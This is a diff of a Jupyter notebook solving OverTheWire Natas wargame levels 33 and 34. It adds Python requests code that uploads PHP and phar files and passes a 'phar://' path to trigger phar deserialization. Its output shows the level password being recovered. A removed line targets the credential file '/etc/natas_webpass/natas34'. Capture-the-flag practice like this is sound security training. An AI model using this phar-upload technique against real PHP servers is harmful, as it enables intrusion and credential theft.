--- a/Natas/natas.ipynb
+++ b/Natas/natas.ipynb
@@ -1741,7 +1741,7 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
-    "## natas30\n"
+    "## Natas30\n"
    ]
   },
   {
@@ -1787,7 +1787,7 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
-    "## natas31\n"
+    "## Natas31\n"
    ]
   },
   {
@@ -1846,7 +1846,7 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
-    "## natas32\n"
+    "## Natas32\n"
    ]
   },
   {
@@ -1891,29 +1891,41 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
-    "## natas33\n"
+    "## Natas33\n"
    ]
   },
   {
    "cell_type": "code",
-   "execution_count": 7,
+   "execution_count": 8,
    "metadata": {},
    "outputs": [
     {
      "name": "stdout",
      "output_type": "stream",
      "text": [
+      "--------------------------------------------------upload php file--------------------------------------------------\n",
+      "            <h2>Can you get it right?</h2>\n",
+      "\n",
+      "            The update has been uploaded to: /natas33/upload/natas33.php<br>Firmware upgrad initialised.<br>Failur! MD5sum mismatch!<br>            <form enctype=\"multipart/form-data\" action=\"index.php\" method=\"POST\">\n",
+      "\n",
+      "--------------------------------------------------upload php file--------------------------------------------------\n",
+      "--------------------------------------------------upload phar file--------------------------------------------------\n",
+      "            <h2>Can you get it right?</h2>\n",
+      "\n",
+      "            The update has been uploaded to: /natas33/upload/natas33.phar<br>Firmware upgrad initialised.<br>Failur! MD5sum mismatch!<br>            <form enctype=\"multipart/form-data\" action=\"index.php\" method=\"POST\">\n",
+      "--------------------------------------------------upload phar file--------------------------------------------------\n",
+      "--------------------------------------------------run phar--------------------------------------------------\n",
       "            <h2>Can you get it right?</h2>\n",
       "\n",
       "            <br />\n",
-      "<b>Warning</b>:  move_uploaded_file(/natas33/upload/phar://natas33.phar): failed to open stream: No such file or directory in <b>/var/www/natas/natas33/index.php</b> on line <b>27</b><br />\n",
+      "<b>Warning</b>:  move_uploaded_file(/natas33/upload/phar:///natas33/upload/natas33.phar): failed to open stream: No such file or directory in <b>/var/www/natas/natas33/index.php</b> on line <b>27</b><br />\n",
       "<br />\n",
-      "<b>Warning</b>:  move_uploaded_file(): Unable to move '/var/lib/php/uploadtmp/phpxvrbhy' to '/natas33/upload/phar://natas33.phar' in <b>/var/www/natas/natas33/index.php</b> on line <b>27</b><br />\n",
+      "<b>Warning</b>:  move_uploaded_file(): Unable to move '/var/lib/php/uploadtmp/phpHcbMSb' to '/natas33/upload/phar:///natas33/upload/natas33.phar' in <b>/var/www/natas/natas33/index.php</b> on line <b>27</b><br />\n",
       "There was an error uploading the file, please try again!<br><br />\n",
-      "<b>Warning</b>:  md5_file(phar://natas33.phar): failed to open stream: internal corruption of phar &quot;/natas33/upload/natas33.phar&quot; (truncated manifest header) in <b>/var/www/natas/natas33/index.php</b> on line <b>42</b><br />\n",
+      "<b>Warning</b>:  md5_file(phar:///natas33/upload/natas33.phar): failed to open stream: phar error: file &quot;&quot; in phar &quot;/natas33/upload/natas33.phar&quot; cannot be empty in <b>/var/www/natas/natas33/index.php</b> on line <b>42</b><br />\n",
       "Failur! MD5sum mismatch!<br>            <form enctype=\"multipart/form-data\" action=\"index.php\" method=\"POST\">\n",
       "                <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"4096\" />\n",
-      "                <input type=\"hidden\" name=\"filename\" value=\"95m20ke1evjnv92oq7dvdaava4\" />\n",
+      "                <input type=\"hidden\" name=\"filename\" value=\"9ag2bsj0lnd683gqrabii867g8\" />\n",
       "                Upload Firmware Update:<br/>\n",
       "                <input name=\"uploadedfile\" type=\"file\" /><br />\n",
       "                <input type=\"submit\" value=\"Upload File\" />\n",
@@ -1923,8 +1935,20 @@
       "        </div>\n",
       "    </body>\n",
       "</html>\n",
-      "\n"
+      "Congratulations! Running firmware update: natas33.php <br>j4O7Q7Q5er5XFRCepmyXJaWCSIrslCJY\n",
+      "\n",
+      "password found: j4O7Q7Q5er5XFRCepmyXJaWCSIrslCJY\n"
      ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "True"
+      ]
+     },
+     "execution_count": 8,
+     "metadata": {},
+     "output_type": "execute_result"
     }
    ],
    "source": [
@@ -1932,14 +1956,81 @@
     "count = 33\n",
     "init()\n",
     "\n",
-    "signature = \"adeafbadbabec0dedabada55ba55d00d\"\n",
-    "\n",
-    "files = {\"uploadedfile\": open(\"natas33.phar\", \"rb\")}\n",
-    "data = {\"filename\": \"/etc/natas_webpass/natas34\"}\n",
-    "data = {\"filename\": \"phar://natas33.phar\"}\n",
+    "# upload php file\n",
+    "print(\"-\" * 50 + \"upload php file\" + \"-\" * 50)\n",
+    "file = open(\"natas33.php\", \"rb\")\n",
+    "files = {\"uploadedfile\": file}\n",
+    "data = {\"filename\": \"natas33.php\"}\n",
     "res = requests.post(url, auth=auth, files=files, data=data)\n",
+    "file.close()\n",
+    "print(res.text[905:1167])\n",
+    "print(\"-\" * 50 + \"upload php file\" + \"-\" * 50)\n",
     "\n",
-    "print(res.text[905:])\n"
+    "# upload phar file\n",
+    "print(\"-\" * 50 + \"upload phar file\" + \"-\" * 50)\n",
+    "file = open(\"natas33.phar\", \"rb\")\n",
+    "files = {\"uploadedfile\": file}\n",
+    "data = {\"filename\": \"natas33.phar\"}\n",
+    "res = requests.post(url, auth=auth, files=files, data=data)\n",
+    "print(res.text[905:1167])\n",
+    "print(\"-\" * 50 + \"upload phar file\" + \"-\" * 50)\n",
+    "\n",
+    "# pass \"phar://natas33.phar\" to md5_file\n",
+    "print(\"-\" * 50 + \"run phar\" + \"-\" * 50)\n",
+    "files = {\"uploadedfile\": file}\n",
+    "data = {\"filename\": \"phar:///natas33/upload/natas33.phar\"}\n",
+    "res = requests.post(url, auth=auth, files=files, data=data)\n",
+    "file.close()\n",
+    "\n",
+    "print(res.text[905:])\n",
+    "find_pwd(res)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Natas34\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "<html>\n",
+      "<head>\n",
+      "<!-- This stuff in the header has nothing to do with the level -->\n",
+      "<link rel=\"stylesheet\" type=\"text/css\" href=\"http://natas.labs.overthewire.org/css/level.css\">\n",
+      "<link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/jquery-ui.css\" />\n",
+      "<link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/wechall.css\" />\n",
+      "<script src=\"http://natas.labs.overthewire.org/js/jquery-1.9.1.js\"></script>\n",
+      "<script src=\"http://natas.labs.overthewire.org/js/jquery-ui.js\"></script>\n",
+      "<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src=\"http://natas.labs.overthewire.org/js/wechall.js\"></script>\n",
+      "<script>var wechallinfo = { \"level\": \"natas34\", \"pass\": \"j4O7Q7Q5er5XFRCepmyXJaWCSIrslCJY\" };</script></head>\n",
+      "<body>\n",
+      "<h1>natas34</h1>\n",
+      "<div id=\"content\">\n",
+      "Congratulations! You have reached the end... for now.\n",
+      "</div>\n",
+      "</body>\n",
+      "</html>\n",
+      "\n",
+      "\n"
+     ]
+    }
+   ],
+   "source": [
+    "# natas34\n",
+    "count = 34\n",
+    "init()\n",
+    "\n",
+    "res = requests.get(url, auth=auth)\n",
+    "print(res.text)"
    ]
   }
  ],
